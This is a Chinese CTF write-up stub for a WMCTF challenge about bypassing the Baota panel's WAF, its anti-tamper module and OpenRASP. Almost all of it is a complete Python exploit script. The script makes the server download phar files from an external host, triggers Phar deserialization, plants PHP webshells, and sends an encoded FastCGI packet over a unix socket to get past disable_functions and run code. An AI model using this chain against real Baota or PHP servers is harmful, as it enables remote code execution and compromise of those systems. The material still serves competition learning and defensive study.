复现地址：http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/

题目附件下载：https://cos.wmctf.wetolink.com/nobody_knows_baota_better_than_me/bak.zip

知识点：

• PHP Phar 反序列化
• 宝塔 Apache WAF 绕过
• 宝塔防篡改模块绕过
• OpenRASP 绕过
• SSRF 攻击本地 unix domain socket 绕过 PHP disable_function

最近上班忙- -文字版 WriteUp 之后写。。。

视频版解说：

https://www.bilibili.com/video/BV1jZ4y1K7Gi

Exp：

import socket
import requests

s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)

s.connect(("111.73.46.229", 80))

s.send(b'GET /phpmyadmin_/../index.php?s=wechat/Review/img&url=https://buu-1251267611.cos.ap-beijing-1.myqcloud.com/wmctfexp203989rdjoijejww/folder.phar HTTP/1.1\r\nHost: wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in\r\ncache-control: no-cache\r\n\r\n\r\n')
response = s.recv(4096)
print(response)

print("[+]目录 ./static/runtime 创建所需 phar 下载成功。")

s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)

s.connect(("111.73.46.229", 80))

s.send(b'GET /phpmyadmin_/../index.php?s=wechat/Review/img&url=phar://./static/upload/tmp/bdc839bdd08a3cc4/07f1d630e3a4301e.jpg/test.txt HTTP/1.1\r\nHost: wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in\r\ncache-control: no-cache\r\n\r\n\r\n')
response = s.recv(4096)
print(response)

print("[+]目录 ./static/runtime 创建成功。")

s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)

s.connect(("111.73.46.229", 80))

s.send(b'GET /phpmyadmin_/../index.php?s=wechat/Review/img&url=https://buu-1251267611.cos.ap-beijing-1.myqcloud.com/wmctfexp203989rdjoijejww/file.phar?a=12 HTTP/1.1\r\nHost: wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in\r\ncache-control: no-cache\r\n\r\n\r\n')
response = s.recv(4096)
print(response)

print("[+]文件创建所需 phar 下载成功。")

s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)

s.connect(("111.73.46.229", 80))

s.send(b'GET /phpmyadmin_/../index.php?s=wechat/Review/img&url=phar://./static/upload/tmp/d062aa2572ad8816/591e8c689ee63736.jpg/test.txt HTTP/1.1\r\nHost: wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in\r\ncache-control: no-cache\r\n\r\n\r\n')
response = s.recv(4096)
print(response)

print("[+]文件创建所需 phar 执行成功。")

url = "http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/static/runtime/468bc8d30505000a2d7d24702b2cda94.php"

payload = "glzjin1=glzjinsend.php&glzjin2=PD9waHAgJGZzID0gZnNvY2tvcGVuKCd1bml4Oi8vL3RtcC9waHAtY2dpLTcwLnNvY2snKTtmd3JpdGUoJGZzLCBiYXNlNjRfZGVjb2RlKCRfUE9TVFtnbHpqaW5kYXRhXSkpO3doaWxlICghZmVvZigkZnMpKSB7cHJpbnQgZnJlYWQoJGZzLDI1Nik7fQ"
headers = {
    'Content-Type': "application/x-www-form-urlencoded",
    'cache-control': "no-cache",
    'Postman-Token': "3e16adf8-2061-4826-a98a-09c421042e72"
    }

response = requests.request("POST", url, data=payload, headers=headers)

print(response.text)

print("[+]写入 socket 代理成功。")

url = "http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/static/runtime/468bc8d30505000a2d7d24702b2cda94.php"

payload = "glzjin1=glzjindownload.php&glzjin2=JTNDJTNGcGhwJTBBJTBBZmlsZV9wdXRfY29udGVudHMlMjglMjJnbHpqaW5wd24ucGhwJTIyJTJDZmlsZV9nZXRfY29udGVudHMlMjglMjJodHRwcyUzQSUyRiUyRmJ1dS0xMjUxMjY3NjExLmNvcy5hcC1iZWlqaW5nLTEubXlxY2xvdWQuY29tJTJGd21jdGZleHAyMDM5ODlyZGpvaWpland3JTJGZ2x6amlucHduLnBocCUyMiUyOSUyOSUzQg"
headers = {
    'Content-Type': "application/x-www-form-urlencoded",
    'cache-control': "no-cache",
    'Postman-Token': "a59157d0-3e61-400b-b7f0-efb6383fd798"
    }

response = requests.request("POST", url, data=payload, headers=headers)

print(response.text)

print("[+]写入 PHP7.0 利用下载脚本成功。")

url = "http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/static/runtime/glzjindownload.php"

payload = ""
headers = {
    'Content-Type': "application/x-www-form-urlencoded",
    'cache-control': "no-cache",
    'Postman-Token': "778206ba-c135-47ff-bbc5-8bccb8e2751e"
    }

response = requests.request("GET", url, data=payload, headers=headers)

print(response.text)

print("[+]写入 PHP7.0 利用脚本成功。")

url = "http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/static/runtime/glzjinsend.php"

payload = "glzjindata=AQEydwAIAAAAAQAAAAAAAAEEMncCOgAAEQtHQVRFV0FZX0lOVEVSRkFDRUZhc3RDR0kvMS4wDgRSRVFVRVNUX01FVEhPRFBPU1QPN1NDUklQVF9GSUxFTkFNRS93d3cvd3d3cm9vdC8xOTIuMTY4LjEyMy4yL3N0YXRpYy9ydW50aW1lL2dsemppbnB3bi5waHALN1NDUklQVF9OQU1FL3d3dy93d3dyb290LzE5Mi4xNjguMTIzLjIvc3RhdGljL3J1bnRpbWUvZ2x6amlucHduLnBocAwAUVVFUllfU1RSSU5HCzdSRVFVRVNUX1VSSS93d3cvd3d3cm9vdC8xOTIuMTY4LjEyMy4yL3N0YXRpYy9ydW50aW1lL2dsemppbnB3bi5waHANAURPQ1VNRU5UX1JPT1QvDw5TRVJWRVJfU09GVFdBUkVwaHAvZmNnaWNsaWVudAsJUkVNT1RFX0FERFIxMjcuMC4wLjELBFJFTU9URV9QT1JUOTk4NQsJU0VSVkVSX0FERFIxMjcuMC4wLjELAlNFUlZFUl9QT1JUODALCVNFUlZFUl9OQU1FbG9jYWxob3N0DwhTRVJWRVJfUFJPVE9DT0xIVFRQLzEuMQwQQ09OVEVOVF9UWVBFYXBwbGljYXRpb24vdGV4dA4BQ09OVEVOVF9MRU5HVEg4CR9QSFBfVkFMVUVhdXRvX3ByZXBlbmRfZmlsZSA9IHBocDovL2lucHV0DxZQSFBfQURNSU5fVkFMVUVhbGxvd191cmxfaW5jbHVkZSA9IE9uAQQydwAAAAABBTJ3AAgAADw%2FcGhwID8%2BAQUydwAAAAA%3D&undefined="
headers = {
    'Content-Type': "application/x-www-form-urlencoded",
    'cache-control': "no-cache",
    'Postman-Token': "5e893bb8-4c66-47bc-bbb7-92b8cd0eb6e7"
    }

response = requests.request("POST", url, data=payload, headers=headers)

print(response.text)

print("[+]调用 PHP7.0 Socket 去执行 PHP7.0 利用脚本成功。")

import requests

url = "http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/static/runtime/glzjinflag.txt"

payload = ""
headers = {
    'Content-Type': "application/x-www-form-urlencoded",
    'cache-control': "no-cache",
    'Postman-Token': "f9b09a86-1dac-49a7-9c78-b7e9fa215b36"
    }

response = requests.request("GET", url, data=payload, headers=headers)

print(response.text)

print("[+]获取 flag 成功！")